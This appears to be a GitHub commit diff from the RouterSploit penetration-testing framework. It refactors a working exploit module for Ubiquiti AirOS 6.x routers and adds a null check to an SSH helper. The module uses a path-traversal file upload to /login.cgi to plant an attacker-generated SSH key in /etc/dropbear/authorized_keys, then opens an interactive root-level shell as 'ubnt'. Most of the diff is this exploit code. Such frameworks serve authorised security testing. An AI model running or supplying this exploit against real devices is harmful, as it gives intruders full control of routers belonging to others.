Fixing airos_6_x (#412)

da6d2e46 · Marcin Bury · GitHub · fa0b2fd0 · da6d2e46 · da6d2e46
Unverified Commit da6d2e46 authored May 10, 2018 by Marcin Bury Committed by GitHub May 10, 2018
Hide whitespace changes
Inline Side-by-side

Showing with 43 additions and 51 deletions

ssh_client.py routersploit/core/ssh/ssh_client.py +6 -5

airos_6_x.py routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py +37 -46

No files found.
--- a/routersploit/core/ssh/ssh_client.py
+++ b/routersploit/core/ssh/ssh_client.py
@@ -120,11 +120,12 @@ class SSHClient(Exploit):
        sftp.putfo(fp_content, dest_file)

    def ssh_interactive(self, ssh):
-        chan = ssh.invoke_shell()
-        if os.name == "posix":
-            self._posix_shell(chan)
-        else:
-            self._windows_shell(chan)
+        if ssh:
+            chan = ssh.invoke_shell()
+            if os.name == "posix":
+                self._posix_shell(chan)
+            else:
+                self._windows_shell(chan)
 
    def _posix_shell(self, chan):
        import termios

--- a/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py
+++ b/routersploit/modules/exploits/routers/ubiquiti/airos_6_x.py
@@ -8,71 +8,62 @@ from routersploit.core.ssh.ssh_client import SSHClient

 class Exploit(HTTPClient, SSHClient):
    __info__ = {
-        'name': 'AirOS 6.x - Arbitrary File Upload',
-        'description': 'Exploit implementation for AirOS 6.x - Arbitrary File Upload. '
-                       'If the target is vulnerable is possible to take full control of the router',
-        'authors': (
-            '93c08539',  # Vulnerability discovery
-            'Vinicius Henrique Marangoni'  # routersploit module
+        "name": "AirOS 6.x - Arbitrary File Upload",
+        "description": "Exploit implementation for AirOS 6.x - Arbitrary File Upload. "
+                       "If the target is vulnerable is possible to take full control of the router.",
+        "authors": (
+            "93c08539",  # vulnerability discovery
+            "Vinicius Henrique Marangoni",  # routersploit module
        ),
-        'references': (
-            'https://hackerone.com/reports/73480',
-            'https://www.exploit-db.com/exploits/39701/'
+        "references": (
+            "https://hackerone.com/reports/73480",
+            "https://www.exploit-db.com/exploits/39701/",
        ),
-        'devices': (
-            'AirOS 6.x'
+        "devices": (
+            "AirOS 6.x",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
-    port = OptPort(80, "Target HTTP port")
+    port = OptPort(443, "Target HTTP port")
    ssl = OptBool("true", "SSL enabled: true/false")

    ssh_port = OptPort(22, "Target SSH Port")

    def run(self):
        if self.check():
-            print_success('Target is vulnerable')
-            print_success('Trying to exploit by uploading SSH public key')
+            print_success("Target is vulnerable")
+            print_success("Trying to exploit by uploading SSH public key")

            key = paramiko.RSAKey.generate(1024)
            public_key = key.get_base64()
-            private_key = StringIO.StringIO()
+            private_key = StringIO()
            key.write_private_key(private_key)

            tmp_file_pubkey = tempfile.TemporaryFile()
-            tmp_file_pubkey.write('ssh-rsa ' + public_key)
+            tmp_file_pubkey.write(bytes("ssh-rsa " + public_key, "utf-8"))
            tmp_file_pubkey.seek(0)

-            upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}
+            upload_params = {"file": ("../../etc/dropbear/authorized_keys", tmp_file_pubkey, {"Expect": ""})}

-            upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port)
-            response = http_request(url=upload_url, method='POST', files=upload_params)
+            response = self.http_request(
+                method="POST",
+                path="/login.cgi",
+                files=upload_params
+            )

            if response is None:
-                print_error('Something was wrong while uploading the SSH Public Key')
+                print_error("Exploit failed - Something was wrong while uploading the SSH Public Key")
                return

-            print_success('Appareantly the exploit worked fine')
-            print_success('Trying to invoke a interactive SSH Shell')
+            print_success("Appareantly the exploit worked fine")
+            print_success("Trying to invoke a interactive SSH Shell")

-            client = paramiko.SSHClient()
-            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
-
-            pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
-            pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
-            pseudo_privkey_file.close()
-            private_key.close()
-
-            ip_target = self.target.replace('https://', '')
-            ip_target = ip_target.replace('http://', '')
-            ip_target = ip_target.replace('/', '')
-
-            client.connect(ip_target, self.ssh_port, username='ubnt', pkey=pkey)
-            ssh_interactive(client)
+            ssh_client = self.ssh_login_pkey("ubnt", private_key.getvalue())
+            self.ssh_interactive(ssh_client)

        else:
-            print_error('Target is not vulnerable')
+            print_error("Exploit failed - target is not vulnerable")

    @mute
    def check(self):
@@ -84,13 +75,14 @@ class Exploit(HTTPClient, SSHClient):
        if response is None:
            return False  # Target not vulnerable

-        rand_str = utils.random_text(length=16)
+        rand_str = utils.random_text(16)
+        mark = "vulnerable{}".format(rand_str)

        tmp_payload = tempfile.TemporaryFile()
-        tmp_payload.write("vulnerable{}".format(rand_str).encode())
+        tmp_payload.write(mark.encode())
        tmp_payload.seek(0)

-        upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
+        upload_params = {"file": ("../../../../tmp/airview.uavr", tmp_payload, {"Expect": ""})}

        response = self.http_request(
            method="GET",
@@ -104,17 +96,16 @@ class Exploit(HTTPClient, SSHClient):
            return False  # Target not vulnerable

        # Response to verify if the upload was done correctly
-        airview_url = base_url + 'airview.uavr'
        verify_upload = self.http_request(
            method="GET",
-            path="airview.uavr"
+            path="/airview.uavr"
        )

        # Upload empty file to "clear" the airview.uavr file
        clean_tmp_file = tempfile.TemporaryFile()
        clean_tmp_file.seek(0)

-        upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
+        upload_params = {"file": ("../../../../tmp/airview.uavr", clean_tmp_file, {"Expect": ""})}

        self.http_request(
            method="POST",
@@ -124,7 +115,7 @@ class Exploit(HTTPClient, SSHClient):

        clean_tmp_file.close()

-        if "".join(('vulnerable', rand_str)) in verify_upload.text:
+        if mark in verify_upload.text:
            return True
-        else:
-            return False
+
+        return False